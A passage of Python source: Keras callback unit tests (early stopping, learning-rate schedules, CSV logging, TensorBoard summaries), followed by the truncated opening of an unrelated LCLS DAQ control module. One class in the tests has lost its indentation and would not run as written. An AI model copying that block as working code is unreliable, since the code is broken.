    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
  """`baseline` stops training immediately unless the metric beats it."""
  with self.cached_session():
    np.random.seed(1337)
    baseline = 0.5
    (data, labels), _ = testing_utils.get_test_data(
        train_samples=100,
        test_samples=50,
        input_shape=(1,),
        num_classes=NUM_CLASSES)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=1, num_classes=1, input_dim=1)
    model.compile(
        optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])

    # No patience: failing to beat the baseline stops after a single epoch.
    stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                            baseline=baseline)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) == 1

    # With patience, training must run for at least `patience` epochs.
    patience = 3
    stopper = keras.callbacks.EarlyStopping(monitor='acc',
                                            patience=patience,
                                            baseline=baseline)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
  """`restore_best_weights=True` rolls the model back to the best epoch."""

  class DummyModel(object):
    # Minimal stand-in: the "weights" are just the last epoch number set,
    # so the restored value identifies which epoch was kept.

    def __init__(self):
      self.stop_training = False
      self.weights = -1

    def get_weights(self):
      return self.weights

    def set_weights(self, weights):
      self.weights = weights

    def set_weight_to_epoch(self, epoch):
      self.weights = epoch

  early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
                                             patience=2,
                                             restore_best_weights=True)
  early_stop.model = DummyModel()
  losses = [0.2, 0.15, 0.1, 0.11, 0.12]
  # The best configuration is in the epoch 2 (loss = 0.1000).
  epochs_trained = 0
  early_stop.on_train_begin()
  for epoch in range(len(losses)):
    epochs_trained += 1
    early_stop.model.set_weight_to_epoch(epoch=epoch)
    early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
    if early_stop.model.stop_training:
      break
  # The best configuration is in epoch 2 (loss = 0.1000),
  # and while patience = 2, we're restoring the best weights,
  # so we end up at the epoch with the best weights, i.e. epoch 2
  self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
  """Smoke-test `RemoteMonitor` against the (unreachable) default address."""
  if requests is None:
    # Report a skip instead of silently passing, consistent with
    # test_RemoteMonitorWithJsonPayload in this file. A bare `return`
    # made the test show up as a (meaningless) pass.
    self.skipTest('`requests` required to run this test')

  monitor = keras.callbacks.RemoteMonitor()
  # This will raise a warning since the default address in unreachable:
  monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
  """Schedules taking (epoch) and (epoch, lr) both drive the optimizer LR."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])

    # Epoch-only schedule: lr = 1 / (1 + epoch); the last of 5 epochs
    # (epoch index 4) gives 0.2.
    cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    # NOTE(review): no abs() around the difference, so any lr >= 0.2 - eps
    # fails but any lr < 0.2 passes trivially — assertion looks weaker than
    # intended. TODO confirm and tighten.
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.2) < keras.backend.epsilon()

    # (epoch, lr) schedule: halve the current lr each epoch for 2 epochs.
    cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    # NOTE(review): same missing-abs() concern as above.
    assert (
        float(keras.backend.get_value(
            model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
  """LR is reduced only when improvement is below `min_delta`."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    def make_model():
      # Re-seed both TF and numpy so each model trains identically.
      random_seed.set_random_seed(1234)
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=keras.optimizers.SGD(lr=0.1),
          metrics=['accuracy'])
      return model

    # TODO(psv): Make sure the callback works correctly when min_delta is
    # set as 0. Test fails when the order of this callback and assertion is
    # interchanged.
    # min_delta=0: any improvement counts, so the LR should stay at 0.1.
    model = make_model()
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=0,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)

    model = make_model()
    # This should reduce the LR after the first epoch (due to high epsilon).
    cbks = [
        keras.callbacks.ReduceLROnPlateau(
            monitor='val_loss',
            factor=0.1,
            min_delta=10,
            patience=1,
            cooldown=5)
    ]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=2)
    self.assertAllClose(
        float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
  """LR is held for `patience` stagnant epochs before being reduced."""

  class DummyOptimizer(object):
    # Only the `lr` variable is needed by the callback.

    def __init__(self):
      self.lr = keras.backend.variable(1.0)

  class DummyModel(object):

    def __init__(self):
      self.optimizer = DummyOptimizer()

  reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
      monitor='val_loss', patience=2)
  reduce_on_plateau.model = DummyModel()

  # Loss improves once, then fails to improve for two epochs (= patience).
  losses = [0.0860, 0.1096, 0.1040]
  lrs = []
  for epoch in range(len(losses)):
    reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
    lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))

  # The learning rates should be 1.0 except the last one
  for lr in lrs[:-1]:
    self.assertEqual(lr, 1.0)
  self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
  """Deprecated `epsilon` kwarg maps to `min_delta` and logs a warning."""
  with test.mock.patch.object(logging, 'warning') as mock_log:
    reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
    self.assertRegexpMatches(
        str(mock_log.call_args), '`epsilon` argument is deprecated')
  # The old attribute must be gone; its value lives on as `min_delta`.
  self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
  self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
  self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
  """CSVLogger creates a file, appends to it, and is reusable across fits."""
  with self.cached_session():
    np.random.seed(1337)
    temp_dir = self.get_temp_dir()
    self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
    filepath = os.path.join(temp_dir, 'log.tsv')
    sep = '\t'
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)

    def make_model():
      np.random.seed(1337)
      model = testing_utils.get_small_sequential_mlp(
          num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
      model.compile(
          loss='categorical_crossentropy',
          optimizer=keras.optimizers.SGD(lr=0.1),
          metrics=['accuracy'])
      return model

    # case 1, create new file with defined separator
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)
    assert os.path.exists(filepath)
    with open(filepath) as csvfile:
      dialect = csv.Sniffer().sniff(csvfile.read())
    assert dialect.delimiter == sep
    del model
    del cbks

    # case 2, append data to existing file, skip header
    model = make_model()
    cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=1,
        verbose=0)

    # case 3, reuse of CSVLogger object
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=2,
        verbose=0)

    with open(filepath) as csvfile:
      list_lines = csvfile.readlines()
      # Every row must have the same number of separators (5 columns),
      # and the header row ('epoch', ...) must appear exactly once even
      # though three fits wrote to the file.
      for line in list_lines:
        assert line.count(sep) == 4
      assert len(list_lines) == 5
      output = ' '.join(list_lines)
      assert len(re.findall('epoch', output)) == 1

    os.remove(filepath)
def test_stop_training_csv(self):
  # Test that using the CSVLogger callback with the TerminateOnNaN callback
  # does not result in invalid CSVs.
  np.random.seed(1337)
  tmpdir = self.get_temp_dir()
  self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)

  with self.cached_session():
    fp = os.path.join(tmpdir, 'test.csv')
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)

    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
    model = keras.models.Sequential()
    for _ in range(5):
      model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
    model.compile(loss='mean_squared_error',
                  optimizer='rmsprop')

    def data_generator():
      # Yield real batches at first, then all-NaN batches so that
      # TerminateOnNaN fires partway through training.
      i = 0
      max_batch_index = len(x_train) // BATCH_SIZE
      tot = 0
      while 1:
        if tot > 3 * len(x_train):
          yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
                 np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
        else:
          yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
                 y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
        i += 1
        tot += 1
        i %= max_batch_index

    history = model.fit_generator(data_generator(),
                                  len(x_train) // BATCH_SIZE,
                                  validation_data=(x_test, y_test),
                                  callbacks=cbks,
                                  epochs=20)
    loss = history.history['loss']
    assert len(loss) > 1
    assert loss[-1] == np.inf or np.isnan(loss[-1])

    values = []
    with open(fp) as f:
      for x in csv.reader(f):
        # In windows, due to \r\n line ends we may end up reading empty lines
        # after each line. Skip empty lines.
        if x:
          values.append(x)

    assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
  """Training halts after the first epoch whose loss is inf/NaN."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)

    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    cbks = [keras.callbacks.TerminateOnNaN()]
    model = keras.models.Sequential()
    # A huge constant initializer makes the loss blow up immediately.
    initializer = keras.initializers.Constant(value=1e5)
    for _ in range(5):
      model.add(
          keras.layers.Dense(
              2,
              input_dim=INPUT_DIM,
              activation='relu',
              kernel_initializer=initializer))
    model.add(keras.layers.Dense(NUM_CLASSES))
    model.compile(loss='mean_squared_error', optimizer='rmsprop')

    history = model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=20)
    # Of the requested 20 epochs, only 1 ran before termination.
    loss = history.history['loss']
    assert len(loss) == 1
    assert loss[0] == np.inf
@unittest.skipIf(
    os.name == 'nt',
    'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
  """An `on_train_end` lambda fires and releases a waiting thread."""
  with self.cached_session():
    np.random.seed(1337)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])

    # Start an arbitrary process that should run during model
    # training and be terminated after training has completed.
    e = threading.Event()

    def target():
      e.wait()

    t = threading.Thread(target=target)
    t.start()
    cleanup_callback = keras.callbacks.LambdaCallback(
        on_train_end=lambda logs: e.set())

    cbks = [cleanup_callback]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    t.join()
    assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
  """`RemoteMonitor(send_as_json=True)` posts logs without raising."""
  if requests is None:
    self.skipTest('`requests` required to run this test')
  with self.cached_session():
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    # Consistent with the rest of this file, which calls
    # `keras.utils.to_categorical` rather than the `np_utils` alias.
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='rmsprop',
        metrics=['accuracy'])
    cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]

    # Mock out the network call so no real HTTP request is made.
    with test.mock.patch.object(requests, 'post'):
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
  """Read all summaries under the logdir into a `_SummaryFile`.

  Args:
    logdir: A path to a directory that contains zero or more event
      files, either as direct children or in transitive subdirectories.
      Summaries in these events must only contain old-style scalars,
      images, and histograms. Non-summary events, like `graph_def`s, are
      ignored.

  Returns:
    A `_SummaryFile` object reflecting all summaries written to any
    event files in the logdir or any of its descendant directories.

  Raises:
    ValueError: If an event file contains an summary of unexpected kind.
  """
  result = _SummaryFile()
  # Which result bucket collects each summary-value oneof kind.
  containers = {
      'simple_value': result.scalars,
      'image': result.images,
      'histo': result.histograms,
      'tensor': result.tensors,
  }
  for dirpath, _, filenames in os.walk(logdir):
    event_paths = (
        os.path.join(dirpath, filename)
        for filename in filenames
        if filename.startswith('events.out.'))
    for path in event_paths:
      for event in summary_iterator.summary_iterator(path):
        if not event.summary:  # (e.g., it's a `graph_def` event)
          continue
        for value in event.summary.value:
          # Case on the `value` rather than the summary metadata because
          # the Keras callback uses `summary_ops_v2` to emit old-style
          # summaries. See b/124535134.
          kind = value.WhichOneof('value')
          container = containers.get(kind)
          if container is None:
            raise ValueError(
                'Unexpected summary kind %r in event file %s:\n%r'
                % (kind, path, event))
          container.add(_ObservedSummary(logdir=dirpath, tag=value.tag))
  return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
  """Tests for the TF-2 `keras.callbacks.TensorBoard` callback."""

  def setUp(self):
    super(TestTensorBoardV2, self).setUp()
    # Fresh logdir per test; the callback writes `train` and `validation`
    # run subdirectories underneath it.
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')

  def _get_model(self):
    """Build and compile a small conv model for (10, 10, 1) inputs."""
    layers = [
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1)
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
    model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    return model

  def test_TensorBoard_default_logdir(self):
    """Regression test for cross-platform pathsep in default logdir."""
    os.chdir(self.get_temp_dir())

    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard()  # no logdir specified

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(logdir='.')
    # The default logdir is ./logs relative to the working directory.
    train_dir = os.path.join('.', 'logs', 'train')
    validation_dir = os.path.join('.', 'logs', 'validation')
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_basic(self):
    """Per-epoch loss scalars are written for both train and validation."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_across_invocations(self):
    """Regression test for summary writer resource use-after-free.

    See: <https://github.com/tensorflow/tensorflow/issues/25707>
    """
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    # Reusing the same callback object across two fits must not crash or
    # drop summaries.
    for _ in (1, 2):
      model.fit(
          x,
          y,
          batch_size=2,
          epochs=2,
          validation_data=(x, y),
          callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars, {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        })

  def test_TensorBoard_no_spurious_event_files(self):
    """Without validation data, only the `train` run directory is written."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        callbacks=[tb_cbk])

    events_file_run_basenames = set()
    for (dirpath, dirnames, filenames) in os.walk(self.logdir):
      del dirnames  # unused
      if any(fn.startswith('events.out.') for fn in filenames):
        events_file_run_basenames.add(os.path.basename(dirpath))
    self.assertEqual(events_file_run_basenames, {'train'})

  def test_TensorBoard_batch_metrics(self):
    """With `update_freq=1`, per-batch loss scalars are written as well."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])

    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )

  def test_TensorBoard_weight_histograms(self):
    """`histogram_freq=1` writes per-layer weight histograms."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
    model_type = testing_utils.get_model_type()

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.histograms, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
        },
    )

  def test_TensorBoard_weight_images(self):
    """`write_images=True` additionally writes weights as image summaries."""
    model = self._get_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, write_images=True)
    model_type = testing_utils.get_model_type()

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.scalars,
        {
            _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
            _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.histograms, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
        },
    )
    self.assertEqual(
        self._strip_layer_names(summary_file.images, model_type),
        {
            _ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
            _ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
        },
    )

  def _strip_layer_names(self, summaries, model_type):
    """Deduplicate summary names modulo layer prefix.

    This removes the first slash-component of each tag name: for
    instance, "foo/bar/baz" becomes "bar/baz".

    Args:
      summaries: A `set` of `_ObservedSummary` values.
      model_type: The model type currently being tested.

    Returns:
      A new `set` of `_ObservedSummary` values with layer prefixes
      removed.
    """
    result = set()
    for summary in summaries:
      if '/' not in summary.tag:
        raise ValueError('tag has no layer name: %r' % summary.tag)
      # Subclassed models appear to nest tags one level deeper, so strip
      # two components instead of one.
      start_from = 2 if 'subclass' in model_type else 1
      new_tag = '/'.join(summary.tag.split('/')[start_from:])
      result.add(summary._replace(tag=new_tag))
    return result

  def test_TensorBoard_invalid_argument(self):
    """Unknown keyword arguments raise a helpful `ValueError`."""
    with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
      # NOTE: `wwrite_images` is intentionally misspelled to trigger the
      # unrecognized-argument error; do not "fix" the spelling.
      keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
  """TensorBoard tests that build their own models (graph writing, tracing)."""

  def setUp(self):
    super(TestTensorBoardV2NonParameterizedTest, self).setUp()
    # Fresh logdir per test; the callback writes `train`/`validation` runs.
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')

  def _get_seq_model(self):
    """Build and compile a small sequential conv model."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    return model

  def fitModelAndAssertKerasModelWritten(self, model):
    """Fit `model` with graph writing enabled and assert the 'keras' tag."""
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir,
                                         write_graph=True,
                                         profile_batch=0)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag='keras'),
        },
    )

  def test_TensorBoard_writeSequentialModel_noInputShape(self):
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    # run_eagerly=False here, unlike the parameterized tests — presumably
    # graph writing requires graph-mode execution; confirm before changing.
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_writeSequentialModel_withInputShape(self):
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_writeModel(self):
    # Renamed from `test_TensoriBoard_writeModel` (typo fix); test methods
    # are discovered by their `test_` prefix, so no callers are affected.
    inputs = keras.layers.Input([10, 10, 1])
    x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
    x = keras.layers.Flatten()(x)
    x = keras.layers.Dense(1)(x)
    model = keras.models.Model(inputs=inputs, outputs=[x])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_autoTrace(self):
    """`profile_batch=1` emits a trace tensor tagged with the batch index."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
        },
    )

  def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
    """The trace tag carries the profiled batch number (`batch_2`)."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
        },
    )

  def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
    """A profile batch past the end of training produces no trace."""
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)

    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)

    # Enabled trace only on the 10000th batch, thus it should be empty.
    self.assertEmpty(summary_file.tensors)
# Run the test suite when executed as a script.
if __name__ == '__main__':
  test.main()
|
daq.py | """
This module defines a control interface for the LCLS1 DAQ.
"""
import enum
import functools
import logging
import os
import time
import threading
from importlib import import_module
from ophyd.status import Status, wait as status_wait
from . import ext_scripts
from .ami import set_pyami_filter, set_monitor_det
logger = logging.getLogger(__name__)
pydaq = None
# Wait up to this many seconds for daq to be ready for a begin call
BEGIN_TIMEOUT = 2
# Do not allow begins within this many seconds of a stop
BEGIN_THROTTLE = 1
def check_connect(f):
    """
    Decorator to ensure that the `Daq` is connected before running a method.

    If the daq is not connected, one connection attempt is made; a
    `RuntimeError` is raised when that attempt fails.
    """
    @functools.wraps(f)
    def wrapper(self, *args, **kwargs):
        logger.debug('Checking for daq connection')
        if not self.connected:
            logger.info('DAQ is not connected. Attempting to connect...')
            self.connect()
        # Still not connected after one attempt: fail loudly.
        if not self.connected:
            err = 'Could not connect to DAQ'
            logger.error(err)
            raise RuntimeError(err)
        logger.debug('Daq is connected')
        return f(self, *args, **kwargs)
    return wrapper
class Daq:
"""
